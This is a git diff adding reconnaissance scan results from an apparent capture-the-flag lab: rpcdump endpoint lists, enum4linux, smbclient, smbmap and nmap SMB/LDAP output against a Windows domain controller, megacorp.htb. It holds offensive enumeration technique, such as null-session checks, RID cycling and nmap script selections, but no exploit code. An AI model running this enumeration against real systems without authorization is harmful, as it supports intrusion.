ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol +Provider: samsrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: srvsvc.dll +UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: sysmain.dll +UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0 +Bindings: + ncalrpc:[LRPC-6ba6be7619ad5499b5] + +Protocol: N/A +Provider: N/A +UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server +Bindings: + ncalrpc:[LRPC-e9c9cb51676dd7958e] + +Protocol: N/A +Provider: IKEEXT.DLL +UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API +Bindings: + ncalrpc:[LRPC-a6cbf0f8554ac2dd0e] + +Protocol: N/A +Provider: N/A +UUID : 650A7E26-EAB8-5533-CE43-9C1DFCE11511 v1.0 Vpn APIs +Bindings: + ncalrpc:[LRPC-78511121f1275f430c] + ncalrpc:[VpnikeRpc] + ncalrpc:[RasmanLrpc] + ncacn_np:\\DC[\PIPE\ROUTER] + +Protocol: [MS-SCMR]: Service Control Manager Remote Protocol +Provider: services.exe +UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49678] + +Protocol: [MS-CMPO]: MSDTC Connection Manager: +Provider: msdtcprx.dll +UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 +Bindings: + ncalrpc:[LRPC-3bcaafee1590c0de20] + ncalrpc:[OLE17B51056E4D45A611212712C1451] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + +Protocol: N/A +Provider: N/A +UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 +Bindings: + ncalrpc:[LRPC-802031e034c1f025bd] + +Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management +Provider: dns.exe +UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49695] + +Protocol: [MS-FRS2]: Distributed File System Replication Protocol +Provider: dfsrmig.exe +UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service +Bindings: + ncacn_ip_tcp:10.129.243.131[49843] + ncalrpc:[OLECF74F747061ABA28294F2BDC6FF0] + +Protocol: N/A +Provider: N/A +UUID : BF4DC912-E52F-4904-8EBE-9317C1BDD497 v1.0 +Bindings: + ncalrpc:[LRPC-92939372b55364a6c8] + ncalrpc:[OLE9D9AB6AB4D22AD38C10DD1548060] + +[*] Received 405 endpoints. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml new file mode 100644 index 00000000..6f81964a --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml @@ -0,0 +1,36 @@ + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt new file mode 100644 index 00000000..84e5c972 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/enum4linux.txt @@ -0,0 +1,139 @@ +Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Oct 28 14:27:53 2023 + + =========================================( Target Information )========================================= + +Target ........... 10.129.243.131 +RID Range ........ 500-550,1000-1050 +Username ......... '' +Password ......... '' +Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none + + + ===========================( Enumerating Workgroup/Domain on 10.129.243.131 )=========================== + + +[E] Can't find workgroup/domain + + + + ===============================( Nbtstat Information for 10.129.243.131 )=============================== + +Looking up status of 10.129.243.131 +No reply from 10.129.243.131 + + ==================================( Session Check on 10.129.243.131 )================================== + + +[+] Server 10.129.243.131 allows sessions using username '', password '' + + + ==========================( Getting information via LDAP for 10.129.243.131 )========================== + + +[+] 10.129.243.131 appears to be a child DC + + + ===============================( Getting domain SID for 10.129.243.131 )=============================== + +Domain Name: MEGACORP +Domain Sid: S-1-5-21-855300830-391258870-456067225 + +[+] Host is part of a domain (not a workgroup) + + + ==================================( OS information on 10.129.243.131 )================================== + + +[E] Can't get OS info with smbclient + + +[+] Got OS info for 10.129.243.131 from srvinfo: +do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED + + + ======================================( Users on 10.129.243.131 )====================================== + + +[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED + + + +[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED + + + ===============================( Machine Enumeration on 10.129.243.131 )=============================== + + +[E] Not implemented in this version of enum4linux. + + + ================================( Share Enumeration on 10.129.243.131 )================================ + +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + +[+] Attempting to map shares on 10.129.243.131 + + + ===========================( Password Policy Information for 10.129.243.131 )=========================== + + +[E] Unexpected error from polenum: + + + +[+] Attaching to 10.129.243.131 using a NULL share + +[+] Trying protocol 139/SMB... + + [!] Protocol failed: Cannot request session (Called Name:10.129.243.131) + +[+] Trying protocol 445/SMB... + + [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. + + + +[E] Failed to get password policy with rpcclient + + + + ======================================( Groups on 10.129.243.131 )====================================== + + +[+] Getting builtin groups: + + +[+]  Getting builtin group memberships: + + +[+]  Getting local groups: + + +[+]  Getting local group memberships: + + +[+]  Getting domain groups: + + +[+]  Getting domain group memberships: + + + =================( Users on 10.129.243.131 via RID cycling (RIDS: 500-550,1000-1050) )================= + + +[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible. + + + ==============================( Getting printer info for 10.129.243.131 )============================== + +do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED + + +enum4linux complete on Sat Oct 28 14:28:33 2023 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt new file mode 100644 index 00000000..8f23bc11 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/nbtscan.txt @@ -0,0 +1,3 @@ +Doing NBT name scan for addresses from 10.129.243.131 + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt new file mode 100644 index 00000000..af09fa1c --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbclient.txt @@ -0,0 +1,8 @@ +do_connect: Connection to 10.129.243.131 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) +Anonymous login successful + + Sharename Type Comment + --------- ---- ------- +Reconnecting with SMB1 for workgroup listing. +Unable to connect with SMB1 -- no workgroup available + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-execute-command.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-list-contents.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt new file mode 100644 index 00000000..d464d6d8 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/smbmap-share-permissions.txt @@ -0,0 +1,3 @@ +[!] RPC Authentication error occurred +[!] Authentication error on 10.129.243.131 + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt new file mode 100644 index 00000000..aa448409 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt @@ -0,0 +1,22 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 139 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.036s latency). +Scanned at 2023-10-28 14:27:57 CEST for 41s + +PORT STATE SERVICE REASON VERSION +139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn +|_smb-enum-services: ERROR: Script execution failed (use -d to debug) +Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows + +Host script results: +|_smb2-time: ERROR: Script execution failed (use -d to debug) +|_smb-protocols: No dialects accepted. Something may be blocking the responses +|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-mbenum: ERROR: Script execution failed (use -d to debug) +|_smb2-capabilities: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-vuln-ms10-061: SMB: Couldn't find a NetBIOS name that works for the server. Sorry! +|_smb-print-text: false + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:38 2023 -- 1 IP address (1 host up) scanned in 45.20 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml new file mode 100644 index 00000000..13cebdab --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml @@ -0,0 +1,43 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt new file mode 100644 index 00000000..782b6b8b --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt @@ -0,0 +1,108 @@ +# Nmap 7.93 scan initiated Sat Oct 28 14:27:53 2023 as: nmap -vv --reason -Pn -T4 -sV -p 3268 "--script=banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set (0.050s latency). +Scanned at 2023-10-28 14:27:57 CEST for 17s + +PORT STATE SERVICE REASON VERSION +3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-Name) +| ldap-rootdse: +| LDAP Results +| +| domainFunctionality: 7 +| forestFunctionality: 7 +| domainControllerFunctionality: 7 +| rootDomainNamingContext: DC=MEGACORP,DC=LOCAL +| ldapServiceName: MEGACORP.LOCAL:dc$@MEGACORP.LOCAL +| isGlobalCatalogReady: TRUE +| supportedSASLMechanisms: GSSAPI +| supportedSASLMechanisms: GSS-SPNEGO +| supportedSASLMechanisms: EXTERNAL +| supportedSASLMechanisms: DIGEST-MD5 +| supportedLDAPVersion: 3 +| supportedLDAPVersion: 2 +| supportedLDAPPolicies: MaxPoolThreads +| supportedLDAPPolicies: MaxPercentDirSyncRequests +| supportedLDAPPolicies: MaxDatagramRecv +| supportedLDAPPolicies: MaxReceiveBuffer +| supportedLDAPPolicies: InitRecvTimeout +| supportedLDAPPolicies: MaxConnections +| supportedLDAPPolicies: MaxConnIdleTime +| supportedLDAPPolicies: MaxPageSize +| supportedLDAPPolicies: MaxBatchReturnMessages +| supportedLDAPPolicies: MaxQueryDuration +| supportedLDAPPolicies: MaxDirSyncDuration +| supportedLDAPPolicies: MaxTempTableSize +| supportedLDAPPolicies: MaxResultSetSize +| supportedLDAPPolicies: MinResultSets +| supportedLDAPPolicies: MaxResultSetsPerConn +| supportedLDAPPolicies: MaxNotificationPerConn +| supportedLDAPPolicies: MaxValRange +| supportedLDAPPolicies: MaxValRangeTransitive +| supportedLDAPPolicies: ThreadMemoryLimit +| supportedLDAPPolicies: SystemMemoryLimitPercent +| supportedControl: 1.2.840.113556.1.4.319 +| supportedControl: 1.2.840.113556.1.4.801 +| supportedControl: 1.2.840.113556.1.4.473 +| supportedControl: 1.2.840.113556.1.4.528 +| supportedControl: 1.2.840.113556.1.4.417 +| supportedControl: 1.2.840.113556.1.4.619 +| supportedControl: 1.2.840.113556.1.4.841 +| supportedControl: 1.2.840.113556.1.4.529 +| supportedControl: 1.2.840.113556.1.4.805 +| supportedControl: 1.2.840.113556.1.4.521 +| supportedControl: 1.2.840.113556.1.4.970 +| supportedControl: 1.2.840.113556.1.4.1338 +| supportedControl: 1.2.840.113556.1.4.474 +| supportedControl: 1.2.840.113556.1.4.1339 +| supportedControl: 1.2.840.113556.1.4.1340 +| supportedControl: 1.2.840.113556.1.4.1413 +| supportedControl: 2.16.840.1.113730.3.4.9 +| supportedControl: 2.16.840.1.113730.3.4.10 +| supportedControl: 1.2.840.113556.1.4.1504 +| supportedControl: 1.2.840.113556.1.4.1852 +| supportedControl: 1.2.840.113556.1.4.802 +| supportedControl: 1.2.840.113556.1.4.1907 +| supportedControl: 1.2.840.113556.1.4.1948 +| supportedControl: 1.2.840.113556.1.4.1974 +| supportedControl: 1.2.840.113556.1.4.1341 +| supportedControl: 1.2.840.113556.1.4.2026 +| supportedControl: 1.2.840.113556.1.4.2064 +| supportedControl: 1.2.840.113556.1.4.2065 +| supportedControl: 1.2.840.113556.1.4.2066 +| supportedControl: 1.2.840.113556.1.4.2090 +| supportedControl: 1.2.840.113556.1.4.2205 +| supportedControl: 1.2.840.113556.1.4.2204 +| supportedControl: 1.2.840.113556.1.4.2206 +| supportedControl: 1.2.840.113556.1.4.2211 +| supportedControl: 1.2.840.113556.1.4.2239 +| supportedControl: 1.2.840.113556.1.4.2255 +| supportedControl: 1.2.840.113556.1.4.2256 +| supportedControl: 1.2.840.113556.1.4.2309 +| supportedControl: 1.2.840.113556.1.4.2330 +| supportedControl: 1.2.840.113556.1.4.2354 +| supportedCapabilities: 1.2.840.113556.1.4.800 +| supportedCapabilities: 1.2.840.113556.1.4.1670 +| supportedCapabilities: 1.2.840.113556.1.4.1791 +| supportedCapabilities: 1.2.840.113556.1.4.1935 +| supportedCapabilities: 1.2.840.113556.1.4.2080 +| supportedCapabilities: 1.2.840.113556.1.4.2237 +| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL +| schemaNamingContext: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=MEGACORP,DC=LOCAL +| namingContexts: CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=DomainDnsZones,DC=MEGACORP,DC=LOCAL +| namingContexts: DC=ForestDnsZones,DC=MEGACORP,DC=LOCAL +| isSynchronized: TRUE +| highestCommittedUSN: 77897 +| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL +| dnsHostName: DC.MEGACORP.LOCAL +| defaultNamingContext: DC=MEGACORP,DC=LOCAL +| currentTime: 20231028122804.0Z +|_ configurationNamingContext: CN=Configuration,DC=MEGACORP,DC=LOCAL +Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:28:14 2023 -- 1 IP address (1 host up) scanned in 21.16 seconds diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml new file mode 100644 index 00000000..655d97ee --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml @@ -0,0 +1,42 @@ + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + + +cpe:/o:microsoft:windows + + + + + + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt new file mode 100644 index 00000000..51fd1598 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp593/tcp_593_rpc_rpcdump.txt @@ -0,0 +1,880 @@ +Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation + +[*] Retrieving endpoint list from 10.129.243.131 +Protocol: [MS-RSP]: Remote Shutdown Protocol +Provider: wininit.exe +UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49664] + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + +Protocol: N/A +Provider: winlogon.exe +UUID : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 +Bindings: + ncalrpc:[WindowsShutdown] + ncacn_np:\\DC[\PIPE\InitShutdown] + ncalrpc:[WMsgKRpc089280] + ncalrpc:[WMsgKRpc08A621] + +Protocol: N/A +Provider: N/A +UUID : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0 +Bindings: + ncalrpc:[csebpub] + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + ncalrpc:[LRPC-9e83194e1e5674c55f] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: N/A +UUID : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0 +Bindings: + ncalrpc:[LRPC-6b54d635557b62ca53] + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0 +Bindings: + ncalrpc:[LRPC-e71821bbfb97e6ac17] + ncalrpc:[LRPC-6b4af19739a6d01556] + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : DD59071B-3215-4C59-8481-972EDADC0F6A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D47017B-B33B-46AD-9E18-FE96456C5078 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 95406F0B-B239-4318-91BB-CEA3A46FF0DC v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4ED8ABCC-F1E2-438B-981F-BB0E8ABC010C v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: 